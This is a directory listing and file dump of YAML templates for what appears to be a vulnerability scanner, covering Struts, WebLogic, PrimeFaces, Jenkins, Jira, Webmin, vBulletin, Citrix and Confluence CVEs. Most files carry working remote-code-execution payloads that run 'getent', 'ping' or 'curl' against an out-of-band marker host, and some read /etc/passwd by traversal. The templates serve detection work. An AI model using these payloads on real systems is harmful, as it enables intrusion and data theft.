├── CORS-Header-Origin:Referer-Reflect.yaml
├── CVE-2013-2251.yaml
├── CVE-2017-1000486_Primefaces_RCE.yaml
├── CVE-2017-10271.yaml
├── CVE-2017-12611.yaml
├── CVE-2017-3506.yaml
├── CVE-2017-5638.yaml
├── CVE-2017-9791.yaml
├── CVE-2017-9805.yaml
├── CVE-2018-1000861.yaml
├── CVE-2018-11776.yaml
├── CVE-2018-18778-mini_httpd_ptrav.yaml
├── CVE-2019-0232.yaml
├── CVE-2019-11581.yaml
├── CVE-2019-15107.yaml
├── CVE-2019-16759.yaml
├── CVE-2019-19781-Citrix-ADC-Netscaler.yaml
├── CVE-2019-2725.yaml
├── CVE-2019-3396.yaml
├── CVE-2019-5418.yaml
├── CVE-2019-8451.yaml
├── CVE-2020-14882_WebLogic_RCE.yaml
├── CVE-2020-5902_F5_BIG-IP.yaml
├── CVE-2021-44228_Log4j_rce.yaml
├── CVE-2021-44228_Log4j_ssti.yaml
├── ImageTragick.yaml
├── Insecure-cross-domain-policy.yaml
├── LDAPi-error-based.yaml
├── LFI-windows-prefix.yaml
├── LFI-windows-replace.yaml
├── README.md
├── SVN-Data-Leak.yaml
├── Sandbox-bypass-in-Jenkins.yaml
├── Symfony-debug-panel.yaml
├── Tango-REST-Misconfiguration.yaml
├── apache-server-status.yaml
├── apache-tapestry.yaml
├── apache-tomcat-misconfiguration.yaml
├── app-errors.yaml
├── bak-files.yaml
├── command-injection-linux.yaml
├── command-injection-windows.yaml
├── crlf.yaml
├── directory-listing.yaml
├── django_nginx_alias_traversal.yaml
├── expression-language-injection.yaml
├── ffmpeg-uploads.yaml
├── git-log-output.yaml
├── git.yaml
├── graphql.yaml
├── httpoxy.yaml
├── java-web-inf-parameter.yaml
├── java-web-inf-uri.yaml
├── jenkins-pre-auth.yaml
├── laravel-debugger.yaml
├── memstats.yaml
├── nginx-server-status.yaml
├── nosqli.yaml
├── ntfs-alternative-streams.yaml
├── open-redirect.yaml
├── path-traversal-append.yaml
├── path-traversal-replace.yaml
├── php-data.yaml
├── php-rce.yaml
├── php_wrappers.yaml
├── phpinfo.yaml
├── public-docker-registry.yaml
├── public-jolokia-jmx.yaml
├── pyyaml-deserialization.yaml
├── rce-dotnet-jackson.yaml
├── remote-file-inclusion.yaml
├── shellshock.yaml
├── spel-oob.yaml
├── splunkd-xml-feed.yaml
├── spring-cloud-infoleaks.yaml
├── sqli-error-based.yaml
├── ssh-keys.yaml
├── ssrf-rechecker-lfi.yaml
├── ssrf-rechecker-oob.yaml
├── ssrf.yaml
├── ssti.yaml
├── stored-xss-oob.yaml
├── telerik-infoleaks.yaml
├── vBulletin_CVE-2020-12720.yaml
├── weak-basic-auth.yaml
├── xss-html-injections.yaml
├── xss-oob.yaml
├── xxe.yaml
├── yii-debugger.yaml
└── yii2-gii.yml
/CORS-Header-Origin:Referer-Reflect.yaml:
--------------------------------------------------------------------------------
1 | collect:
2 | - uniq:
3 | - [ URI ]
4 |
5 | generate:
6 | - into:
7 | - HEADER_ORIGIN
8 | - HEADER_REFERER
9 | - payload:
10 | - STR_MARKER
11 | - method:
12 | - postfix
13 | - prefix
14 | - replace
15 |
16 | detect:
17 | - response:
18 | - headers:
19 | - 'Access-Control-Allow-Origin': 'STR_MARKER'
20 | - 'Access-Control-Allow-Origin': '\*'
21 | - body: 'STR_MARKER'
22 |
23 | meta-info:
24 | - type: info
25 | - applicable_for:
26 | - fast
27 | - threat: 30
28 | - tags:
29 | - CORS
30 | - Cross-Origin Resource Sharing
31 | - Header Origin/Referer Reflect
32 |
--------------------------------------------------------------------------------
/CVE-2013-2251.yaml:
--------------------------------------------------------------------------------
1 | collect:
2 | - uniq:
3 | - [ URI ]
4 |
5 | match:
6 | - "ACTION_EXT_value": 'action'
7 |
8 | generate:
9 | - into:
10 | - POST
11 | - payload:
12 | - "redirect:%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{'getent','hosts','DNS_MARKER'})).start()}"
13 | - "redirectAction:%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{'ping','DNS_MARKER', '-n 1'})).start()}"
14 | - method:
15 | - replace
16 |
17 | detect:
18 | - oob:
19 | - dns
20 |
21 | meta-info:
22 | - type: rce
23 | - threat: 90
24 | - tags:
25 | - RCE
26 | - Remote Code Execution
27 | - CVE-2013-2251
28 | - Apache Struts 2.0.0 through 2.3.15
29 |
--------------------------------------------------------------------------------
/CVE-2017-1000486_Primefaces_RCE.yaml:
--------------------------------------------------------------------------------
1 | send:
2 | - method: 'GET'
3 | url: "/javax.faces.resource/dynamiccontent.properties.xhtml?pfdrt=sc&cmd=cat%20/etc/passwd&ln=primefaces&pfdri\
4 | d=4xE5s8AClZxUxmyaZjpBstMXUalIgOJHOtvxel/v4YWWwI8VZnuAX1191Sn+CK9NqgRYi2Eqx0Ip7pBmDQy2FwfVxmTHSyueLw8lvBxR9XlJ\
5 | NxZIpqx8JeJdAJadoM6/fTVxHNSrHEo2BWInksdO2JCryCs0gp7fl+yzbivvc/3dqOsENXJSEuj1v8RULfmL9BNWGB1E6kaSzCMHAq50id6wTK\
6 | 6l3r3CALrenstFeVs6H8taOicp4rXZB+4n5DEgRgEr36/a+Tfe6SvN82GDvyt80SpIlgsycJpP77l5bHs46I6TPeK9ROZdC2LBwbrPQXl0OGoX\
7 | sH2gQbKts3/JPErN8r5f8zyH9jJ1vYs/lyWVs2WmT0rHDkk+zw75eKkY3YwKYTL0oZFI0sO8w1wRaX+MVV1SjgvHKjkKN9W81WMvP0BrStfCPG\
8 | s1OK/jrApynfsZisXjsgy6vVUlfBlI3/SzeeuunqGDjyhcGLgM1U8/qLM/XBEeC+txkljPWq5ZAfbrN9qtgqJSJD7OzfAtAQbXGHAfB+4emCKv\
9 | Bz0+wehBKRy6HfacUHB+DPj7MON7T9iKV3QZ4Qcs8mCSkhlK6MZfj7zkGHsiTnbqQr+qTVj61Pvr6jHMS4akC7S9u2R5vl9gq8KY5wLv9QpyTG\
10 | Mya3hNS+LQXOzajwXr7mSibFWt5rEnRmQLw28VSTtwxZnyHfSKYyCc/zHgx89ScL6ucsccAAHTolh4n3FBgj1jZmaoJ8eGDAa1l0v3NVYv6j6X\
11 | 8cDz5qEx+fcz4ftxUNCaGB/13OaqmdVZXCqGFkGlbbfhzo0BkWBeo4yHxuzXCeLVQZ+hOEqk0jAxVxco97YTW6Yh0/qL+d6IhuAVc7WhH97tDi\
12 | PnRsmSoJ6xPAPxrhdeHiNZoReymXDXPvIUB8BE6dn64MgjAevuN2m1lGVwcwUUem+mwNtJggQ35/FRM7Gfuft1gZTNG+cCuSPD9wT/EYuB7dFE\
13 | 9W4d8BzX4X5zNH9d9MyR9tkC33ZlwKbRaBfwTI/RYef1OdOccQKsevIf6RrTbnL0vxzO8aYp6FBq9x2EYdp54PiBFw/mAgKXhSFw0LhebS6LIm\
14 | NLdjV019/TFp81X210RejGkMXix5TWCCqFd3mmMdlbZB5AzeO2H8mh2BAoeUQs15+f2BpwTTcBUFzodJZx0/Ibx781ZD/mdEo9bzCngHer7OUf\
15 | t/BrEE5cdrAaT96Bl0CYqPtDo8m4WvMU4UFpjFQn2JuTe6vEe+Ep6ljjlP33ZzG2SBJW0Ipb/RUAthLfMLYSXuo1MF1vV1Chie4AbZ+RXyxDmG\
16 | ZqykJ7xZpYOdvj2Ap25y1fcy13UOV3YTlj6fJeP3Sd5bosILMp84fnv3eDX4lLjNpNRSnXoKee7XbLu14Hvnf9jjAMv8JDmnjxrCQV1TXA2/8e\
17 | npl0ytV74kU5W0Zs+LuZjldi9oATW4Zj6w=="
18 |
19 | - method: 'GET'
20 | url: "/javax.faces.resource/dynamiccontent.properties.xhtml?pfdrt=sc&cmd=getent%20hosts%20DNS_MARKER&ln=primefa\
21 | ces&pfdrid=4xE5s8AClZxUxmyaZjpBstMXUalIgOJHOtvxel/v4YWWwI8VZnuAX1191Sn+CK9NqgRYi2Eqx0Ip7pBmDQy2FwfVxmTHSyueLw8l\
22 | vBxR9XlJNxZIpqx8JeJdAJadoM6/fTVxHNSrHEo2BWInksdO2JCryCs0gp7fl+yzbivvc/3dqOsENXJSEuj1v8RULfmL9BNWGB1E6kaSzCMHAq5\
23 | 0id6wTK6l3r3CALrenstFeVs6H8taOicp4rXZB+4n5DEgRgEr36/a+Tfe6SvN82GDvyt80SpIlgsycJpP77l5bHs46I6TPeK9ROZdC2LBwbrPQX\
24 | l0OGoXsH2gQbKts3/JPErN8r5f8zyH9jJ1vYs/lyWVs2WmT0rHDkk+zw75eKkY3YwKYTL0oZFI0sO8w1wRaX+MVV1SjgvHKjkKN9W81WMvP0BrS\
25 | tfCPGs1OK/jrApynfsZisXjsgy6vVUlfBlI3/SzeeuunqGDjyhcGLgM1U8/qLM/XBEeC+txkljPWq5ZAfbrN9qtgqJSJD7OzfAtAQbXGHAfB+4e\
26 | mCKvBz0+wehBKRy6HfacUHB+DPj7MON7T9iKV3QZ4Qcs8mCSkhlK6MZfj7zkGHsiTnbqQr+qTVj61Pvr6jHMS4akC7S9u2R5vl9gq8KY5wLv9Qp\
27 | yTGMya3hNS+LQXOzajwXr7mSibFWt5rEnRmQLw28VSTtwxZnyHfSKYyCc/zHgx89ScL6ucsccAAHTolh4n3FBgj1jZmaoJ8eGDAa1l0v3NVYv6j\
28 | 6X8cDz5qEx+fcz4ftxUNCaGB/13OaqmdVZXCqGFkGlbbfhzo0BkWBeo4yHxuzXCeLVQZ+hOEqk0jAxVxco97YTW6Yh0/qL+d6IhuAVc7WhH97tD\
29 | iPnRsmSoJ6xPAPxrhdeHiNZoReymXDXPvIUB8BE6dn64MgjAevuN2m1lGVwcwUUem+mwNtJggQ35/FRM7Gfuft1gZTNG+cCuSPD9wT/EYuB7dFE\
30 | 9W4d8BzX4X5zNH9d9MyR9tkC33ZlwKbRaBfwTI/RYef1OdOccQKsevIf6RrTbnL0vxzO8aYp6FBq9x2EYdp54PiBFw/mAgKXhSFw0LhebS6LImN\
31 | LdjV019/TFp81X210RejGkMXix5TWCCqFd3mmMdlbZB5AzeO2H8mh2BAoeUQs15+f2BpwTTcBUFzodJZx0/Ibx781ZD/mdEo9bzCngHer7OUft/\
32 | BrEE5cdrAaT96Bl0CYqPtDo8m4WvMU4UFpjFQn2JuTe6vEe+Ep6ljjlP33ZzG2SBJW0Ipb/RUAthLfMLYSXuo1MF1vV1Chie4AbZ+RXyxDmGZqy\
33 | kJ7xZpYOdvj2Ap25y1fcy13UOV3YTlj6fJeP3Sd5bosILMp84fnv3eDX4lLjNpNRSnXoKee7XbLu14Hvnf9jjAMv8JDmnjxrCQV1TXA2/8enpl0\
34 | ytV74kU5W0Zs+LuZjldi9oATW4Zj6w=="
35 |
36 | - method: 'GET'
37 | url: "/javax.faces.resource/dynamiccontent.properties.xhtml?pfdrt=sc&cmd=ping%20-n%201%20DNS_MARKER&ln=primefac\
38 | es&pfdrid=4xE5s8AClZxUxmyaZjpBstMXUalIgOJHOtvxel/v4YWWwI8VZnuAX1191Sn+CK9NqgRYi2Eqx0Ip7pBmDQy2FwfVxmTHSyueLw8lv\
39 | BxR9XlJNxZIpqx8JeJdAJadoM6/fTVxHNSrHEo2BWInksdO2JCryCs0gp7fl+yzbivvc/3dqOsENXJSEuj1v8RULfmL9BNWGB1E6kaSzCMHAq50\
40 | id6wTK6l3r3CALrenstFeVs6H8taOicp4rXZB+4n5DEgRgEr36/a+Tfe6SvN82GDvyt80SpIlgsycJpP77l5bHs46I6TPeK9ROZdC2LBwbrPQXl\
41 | 0OGoXsH2gQbKts3/JPErN8r5f8zyH9jJ1vYs/lyWVs2WmT0rHDkk+zw75eKkY3YwKYTL0oZFI0sO8w1wRaX+MVV1SjgvHKjkKN9W81WMvP0BrSt\
42 | fCPGs1OK/jrApynfsZisXjsgy6vVUlfBlI3/SzeeuunqGDjyhcGLgM1U8/qLM/XBEeC+txkljPWq5ZAfbrN9qtgqJSJD7OzfAtAQbXGHAfB+4em\
43 | CKvBz0+wehBKRy6HfacUHB+DPj7MON7T9iKV3QZ4Qcs8mCSkhlK6MZfj7zkGHsiTnbqQr+qTVj61Pvr6jHMS4akC7S9u2R5vl9gq8KY5wLv9Qpy\
44 | TGMya3hNS+LQXOzajwXr7mSibFWt5rEnRmQLw28VSTtwxZnyHfSKYyCc/zHgx89ScL6ucsccAAHTolh4n3FBgj1jZmaoJ8eGDAa1l0v3NVYv6j6\
45 | X8cDz5qEx+fcz4ftxUNCaGB/13OaqmdVZXCqGFkGlbbfhzo0BkWBeo4yHxuzXCeLVQZ+hOEqk0jAxVxco97YTW6Yh0/qL+d6IhuAVc7WhH97tDi\
46 | PnRsmSoJ6xPAPxrhdeHiNZoReymXDXPvIUB8BE6dn64MgjAevuN2m1lGVwcwUUem+mwNtJggQ35/FRM7Gfuft1gZTNG+cCuSPD9wT/EYuB7dFE9\
47 | W4d8BzX4X5zNH9d9MyR9tkC33ZlwKbRaBfwTI/RYef1OdOccQKsevIf6RrTbnL0vxzO8aYp6FBq9x2EYdp54PiBFw/mAgKXhSFw0LhebS6LImNL\
48 | djV019/TFp81X210RejGkMXix5TWCCqFd3mmMdlbZB5AzeO2H8mh2BAoeUQs15+f2BpwTTcBUFzodJZx0/Ibx781ZD/mdEo9bzCngHer7OUft/B\
49 | rEE5cdrAaT96Bl0CYqPtDo8m4WvMU4UFpjFQn2JuTe6vEe+Ep6ljjlP33ZzG2SBJW0Ipb/RUAthLfMLYSXuo1MF1vV1Chie4AbZ+RXyxDmGZqyk\
50 | J7xZpYOdvj2Ap25y1fcy13UOV3YTlj6fJeP3Sd5bosILMp84fnv3eDX4lLjNpNRSnXoKee7XbLu14Hvnf9jjAMv8JDmnjxrCQV1TXA2/8enpl0y\
51 | tV74kU5W0Zs+LuZjldi9oATW4Zj6w=="
52 |
53 | detect:
54 | - oob:
55 | - dns
56 | - response:
57 | - body: '[a-z]*:[^:]*:[0-9]*:[0-9]*:[^:]*:\/[^:]*:\/[^:]*'
58 |
59 | meta-info:
60 | - title: "CVE-2017-1000486 Primetek Primefaces 5.x remote code execution"
61 | - description: "The vulnerability is due to weak encryption flaw and hardcoded encryption password. As a result, the malicious user may make remote code execution (RCE) via a simple HTTP call."
62 | - type: rce
63 | - threat: 98
64 | - tags:
65 | - Primetek Primefaces 5.x
66 | - CVE-2017-1000486
67 |
--------------------------------------------------------------------------------
/CVE-2017-10271.yaml:
--------------------------------------------------------------------------------
1 | send:
2 | - method: 'POST'
3 | url: '/wls-wsat/CoordinatorPortType'
4 | headers:
5 | - CONTENT-TYPE: text/xml
6 | body: '/bin/sh-cgetent hosts DNS_MARKER'
7 |
8 | - method: 'POST'
9 | url: '/wls-wsat/CoordinatorPortType'
10 | headers:
11 | - CONTENT-TYPE: text/xml
12 | body: 'cmd/cping -n 1 DNS_MARKER'
13 |
14 | detect:
15 | - oob:
16 | - dns
17 |
18 | meta-info:
19 | - type: rce
20 | - threat: 75
21 | - applicable_for:
22 | - fast
23 | - scanner
24 | - tags:
25 | - RCE
26 | - CVE-2017-10271
27 | - Oracle WebLogic Server 10.3.6.0, 12.1.3.0, 12.2.1.1 and 12.2.1.2
28 |
--------------------------------------------------------------------------------
/CVE-2017-12611.yaml:
--------------------------------------------------------------------------------
1 | collect:
2 | - uniq:
3 | - [ URI ]
4 |
5 | generate:
6 | - into:
7 | - GET
8 | - payload:
9 | - "%{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c','ping -n 1 DNS_MARKER'}:{'/bin/sh','-c','getent hosts DNS_MARKER'})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(@org.apache.commons.io.IOUtils@toString(#process.getInputStream()))}"
10 |
11 | - "%{#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse'].addHeader('X-WLRM-VLN-CHECK','STR_MARKER')}.multipart/form-data"
12 |
13 | - method:
14 | - replace
15 |
16 | detect:
17 | - oob:
18 | - dns
19 | - response:
20 | - headers:
21 | - "X-WLRM-VLN-CHECK": STR_MARKER
22 |
23 | meta-info:
24 | - type: rce
25 | - threat: 90
26 | - applicable_for: ["attack_rechecker"]
27 | - tags:
28 | - RCE
29 | - Remote Code Execution
30 | - CVE-2017-12611
31 | - Apache Struts 2.0.1 through 2.3.33 and 2.5 through 2.5.10
32 |
--------------------------------------------------------------------------------
/CVE-2017-3506.yaml:
--------------------------------------------------------------------------------
1 | send:
2 | - method: 'POST'
3 | url: '/wls-wsat/CoordinatorPortType'
4 | headers:
5 | - CONTENT-TYPE: text/xml
6 | body: ''
7 |
8 | - method: 'POST'
9 | url: '/wls-wsat/CoordinatorPortType'
10 | headers:
11 | - CONTENT-TYPE: text/xml
12 | body: ''
13 |
14 | detect:
15 | - oob:
16 | - dns
17 |
18 | meta-info:
19 | - type: rce
20 | - threat: 74
21 | - applicable_for:
22 | - fast
23 | - scanner
24 | - tags:
25 | - RCE
26 | - CVE-2017-3506
27 | - Oracle WebLogic Server 10.3.6.0, 12.1.3.0, 12.2.1.0, 12.2.1.1 and 12.2.1.2
28 |
--------------------------------------------------------------------------------
/CVE-2017-5638.yaml:
--------------------------------------------------------------------------------
1 | send:
2 | - method: 'POST'
3 | url: '/'
4 | headers:
5 | - CONTENT-TYPE: "%{(#_='multipart/form-data').(#_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBE\
6 | R_ACCESS).(@java.lang.Runtime@getRuntime().exec('curl http://DNS_MARKER'))}"
7 |
8 | - method: 'POST'
9 | url: '/'
10 | headers:
11 | - CONTENT-TYPE: "%{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(\
12 | #_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionCo\
13 | ntext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil\
14 | @class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clea\
15 | r()).(#context.setMemberAccess(#dm)))).(#cmd='curl http://DNS_MARKER').(#iswin=(@java.lang.\
16 | System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c\
17 | ',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErro\
18 | rStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getRes\
19 | ponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),\
20 | #ros)).(#ros.flush())}"
21 |
22 | detect:
23 | - oob:
24 | - dns
25 | meta-info:
26 | - type: rce
27 | - threat: 100
28 | - applicable_for:
29 | - fast
30 | - scanner
31 | - tags:
32 | - Remote Code Execution
33 | - CVE-2017-5638
34 | - Apache Struts 2 2.3.x before 2.3.32 and 2.5.x before 2.5.10.1
35 |
--------------------------------------------------------------------------------
/CVE-2017-9791.yaml:
--------------------------------------------------------------------------------
1 | collect:
2 | - uniq:
3 | - [ URI ]
4 |
5 | generate:
6 | - into:
7 | - POST
8 | - payload:
9 |
10 | - "%{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c','ping -n 1 DNS_MARKER'}:{'/bin/sh','-c','getent hosts DNS_MARKER'})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}"
11 |
12 | - "%{#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse'].addHeader('X-WLRM-VLN-CHECK','STR_MARKER')}.multipart/form-data"
13 |
14 | - method:
15 | - replace
16 |
17 | detect:
18 | - oob:
19 | - dns
20 | - response:
21 | - headers:
22 | - "X-WLRM-VLN-CHECK": STR_MARKER
23 |
24 | meta-info:
25 | - type: rce
26 | - threat: 90
27 | - applicable_for: ["attack_rechecker"]
28 | - tags:
29 | - RCE
30 | - Remote Code Execution
31 | - CVE-2017-9791
32 | - Apache Struts 2.3.x
33 |
--------------------------------------------------------------------------------
/CVE-2017-9805.yaml:
--------------------------------------------------------------------------------
1 | send:
2 | - method: 'POST'
3 | url: '/'
4 | headers:
5 | - CONTENT-TYPE: application/xml
6 | body: ''
7 |
8 | - method: 'POST'
9 | url: '/'
10 | headers:
11 | - CONTENT-TYPE: application/xml
12 | body: ''
13 |
14 | detect:
15 | - oob:
16 | - dns
17 |
18 | meta-info:
19 | - type: rce
20 | - threat: 81
21 | - applicable_for:
22 | - fast
23 | - scanner
24 | - tags:
25 | - RCE
26 | - Remote Code Execution
27 | - CVE-2017-9805
28 | - Apache Struts2
29 | - Apache Struts 2.1.2 through 2.3.x before 2.3.34 and 2.5.x before 2.5.13
--------------------------------------------------------------------------------
/CVE-2018-1000861.yaml:
--------------------------------------------------------------------------------
1 | send:
2 | - method: 'GET'
3 | url: '/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.scriptsecurity.sandbox.groovy.SecureGroovyScript/checkScript?sandbox=true&value=public%20class%20x%20{public%20x(){"getent%20hosts%20DNS_MARKER".execute()}}'
4 |
5 | detect:
6 | - oob:
7 | - dns
8 |
9 | meta-info:
10 | - type: rce
11 | - threat: 90
12 | - applicable_for:
13 | - fast
14 | - tags:
15 | - RCE
16 | - CVE-2018-1000861
17 | - Jenkins Authentication/ACL bypass
18 |
--------------------------------------------------------------------------------
/CVE-2018-11776.yaml:
--------------------------------------------------------------------------------
1 | collect:
2 | - uniq:
3 | - [ URI ]
4 | match:
5 | - "ACTION_EXT_value": 'action'
6 | generate:
7 | - into:
8 | - PATH
9 | - payload:
10 | - "${(#_memberAccess['allowStaticMethodAccess']=true,#a=@java.lang.Runtime@getRuntime().exec\
11 | ('curl DNS_MARKER').getInputStream(),#b=new java.io.InputStreamReader(#a),#c=new java.io.Bu\
12 | fferedReader(#b),#d=new char[51020],#c.read(#d),#jas502n= @org.apache.struts2.ServletActionC\
13 | ontext@getResponse().getWriter(),#jas502n.println(#d ),#jas502n.close())}"
14 |
15 | - "${(#_memberAccess['allowStaticMethodAccess']=true,#a=@java.lang.Runtime@getRuntime().exec\
16 | ('echo STR_MARKER').getInputStream(),#b=new java.io.InputStreamReader(#a),#c=new java.io.Bu\
17 | fferedReader(#b),#d=new char[51020],#c.read(#d),#jas502n= @org.apache.struts2.ServletActionC\
18 | ontext@getResponse().getWriter(),#jas502n.println(#d ),#jas502n.close())}"
19 |
20 | - '${CALC_MARKER}'
21 | - method:
22 | - replace
23 | detect:
24 | - oob:
25 | - dns
26 | - response:
27 | - body: STR_MARKER
28 | - body: CALC_MARKER
29 | meta-info:
30 | - type: rce
31 | - threat: 90
32 | - applicable_for:
33 | - fast
34 | - scanner
35 | - tags:
36 | - Remote Code Execution
37 | - CVE-2018-11776
38 | - Apache Struts versions 2.3 to 2.3.34 and 2.5 to 2.5.16
39 |
--------------------------------------------------------------------------------
/CVE-2018-18778-mini_httpd_ptrav.yaml:
--------------------------------------------------------------------------------
1 | #Attention! For this DSL detect you must use a custom test policy with URI_.* insertion point!
2 | send:
3 | - method: 'GET'
4 | url: '/etc/passwd'
5 | headers:
6 | - 'Host': ''
7 | detect:
8 | - response:
9 | - body: '[a-z]*:[^:]*:[0-9]*:[0-9]*:[^:]*:\/[^:]*:\/[^:]*'
10 |
11 | meta-info:
12 | - title: "ACME mini_httpd directory traversal"
13 | - description: "ACME mini_httpd before 1.30 lets remote users read arbitrary files."
14 | - type: "ptrav"
15 | - threat: 65
16 | - applicable_for:
17 | - fast
18 | - scanner
19 | - tags:
20 | - Path Traversal
21 | - Arbitrary File Reading
22 |
--------------------------------------------------------------------------------
/CVE-2019-0232.yaml:
--------------------------------------------------------------------------------
1 | match:
2 | - ACTION_EXT_value: '(bat$)|(cmd$)'
3 | generate:
4 | - into: URI
5 | - payload:
6 | - '?&set'
7 | - '?&dir'
8 | - method:
9 | - postfix
10 | detect:
11 | - response:
12 | - body: '(COMSPEC).*(REMOTE_ADDR).*(REMOTE_HOST)'
13 | - body: '(Volume in drive).*(Directory of)'
14 | - body: '(HOMEDRIVE).*(SystemDrive).*(NUMBER_OF_PROCESSORS)'
15 | meta-info:
16 | - type: rce
17 | - threat: 90
18 | - applicable_for:
19 | - fast
20 | - tags:
21 | - CVE-2019-0232
22 | - Remote Code Execution
23 | - RCE
24 | - Apache Tomcat
--------------------------------------------------------------------------------
/CVE-2019-11581.yaml:
--------------------------------------------------------------------------------
1 | collect:
2 | - uniq:
3 | - [ URI ]
4 |
5 | match:
6 | - "ACTION_NAME_value": 'ContactAdministrators'
7 | - "ACTION_EXT_value": 'jspa'
8 |
9 | modify:
10 | - "HEADER_CONTENT-TYPE_value": "application/x-www-form-urlencoded"
11 |
12 | generate:
13 | - into:
14 | - POST
15 | - payload:
16 | - "$i18n.getClass().forName('java.lang.Runtime').getMethod('getRuntime',null).invoke(null,null).exec('getent hosts DNS_MARKER').waitFor()"
17 | - method:
18 | - replace
19 |
20 | detect:
21 | - oob:
22 | - dns
23 |
24 | meta-info:
25 | - type: rce
26 | - applicable_for: ["fast"]
27 | - threat: 90
28 | - tags:
29 | - RCE
30 | - Remote Code Execution
31 | - CVE-2019-11581
32 | - Atlassian Jira
33 |
--------------------------------------------------------------------------------
/CVE-2019-15107.yaml:
--------------------------------------------------------------------------------
1 | send:
2 | - method: 'POST'
3 | url: '/password_change.cgi'
4 | headers:
5 | - HOST: 127.0.0.1
6 | - REFERER: http://127.0.0.1:10000/session_login.cgi
7 | - CONTENT-TYPE: text/xml
8 | body: 'user=rootxx&pam=&expired=2&old=test|getent hosts DNS_MARKER&new1=test2&new2=test2'
9 |
10 | detect:
11 | - oob:
12 | - dns
13 |
14 | meta-info:
15 | - type: rce
16 | - threat: 98
17 | - applicable_for:
18 | - fast
19 | - scanner
20 | - tags:
21 | - RCE
22 | - CVE-2019-15107
23 | - Webmin <= 1.920
24 |
--------------------------------------------------------------------------------
/CVE-2019-16759.yaml:
--------------------------------------------------------------------------------
1 | send:
2 | - method: 'POST'
3 | url: '/'
4 | headers:
5 | - CONTENT-TYPE: application/x-www-form-urlencoded
6 | body: "routestring=ajax/render/widget_php&widgetConfig[code]=echo+shell_exec('getent hosts DNS_MARKER');+exit;"
7 |
8 | detect:
9 | - oob:
10 | - dns
11 |
12 | meta-info:
13 | - type: rce
14 | - threat: 98
15 | - applicable_for:
16 | - fast
17 | - scanner
18 | - tags:
19 | - RCE
20 | - CVE-2019-16759
21 | - vBulletin 5.x pre-auth RCE
22 |
--------------------------------------------------------------------------------
/CVE-2019-19781-Citrix-ADC-Netscaler.yaml:
--------------------------------------------------------------------------------
1 | send:
2 | - method: 'GET'
3 | url: '/vpn/../vpns/services.html'
4 |
5 | - method: 'GET'
6 | url: '/vpn/../vpns/cfg/smb.conf'
7 |
8 | detect:
9 | - response:
10 | - body: 'name resolve order =.*lmhosts'
11 |
12 | meta-info:
13 | - type: ptrav
14 | - threat: 98
15 | - applicable_for:
16 | - fast
17 | - scanner
18 | - tags:
19 | - Path Traversal
20 | - Citrix ADC
21 | - Citrix Gateway
22 | - NetScaler
23 | - CVE-2019-19781
24 |
--------------------------------------------------------------------------------
/CVE-2019-2725.yaml:
--------------------------------------------------------------------------------
1 | send:
2 | - method: 'POST'
3 | url: '/_async/AsyncResponseServiceHttps'
4 | headers:
5 | - CONTENT-TYPE: text/xml
6 | body: 'xxxxbash-ccurl http://DNS_MARKER '
7 |
8 | - method: 'POST'
9 | url: '/_async/AsyncResponseServiceHttps'
10 | headers:
11 | - CONTENT-TYPE: text/xml
12 | body: 'xxxxcmd/cping DNS_MARKER '
13 |
14 | detect:
15 | - oob:
16 | - dns
17 |
18 | meta-info:
19 | - type: rce
20 | - threat: 98
21 | - applicable_for:
22 | - fast
23 | - scanner
24 | - tags:
25 | - RCE
26 | - Remote Code Execution
27 | - CVE-2019-2725
28 | - Oracle
29 | - Oracle Weblogic 10.3.6.0.0 / 12.1.3.0.0
--------------------------------------------------------------------------------
/CVE-2019-3396.yaml:
--------------------------------------------------------------------------------
1 | send:
2 | - method: 'POST'
3 | url: '/rest/tinymce/1/macro/preview'
4 | headers:
5 | - CONTENT-TYPE: application/json
6 | body: '{"contentId":"65592","macro":{"name":"widget","params":{"url": "https://www.youtube.com/watch?v=0rX-Cp3Hzn4","width":"1000","height":"1000","_template":"file:///etc/passwd"},"body":""}}'
7 |
8 | detect:
9 | - response:
10 | - body: '[a-z]*:[^:]*:[0-9]*:[0-9]*:[^:]*:\/[^:]*:\/[^:]*'
11 |
12 | meta-info:
13 | - type: ptrav
14 | - threat: 98
15 | - applicable_for:
16 | - fast
17 | - scanner
18 | - tags:
19 | - Path Traversal
20 | - CVE-2019-3396
21 | - Atlassian
22 | - Confluence
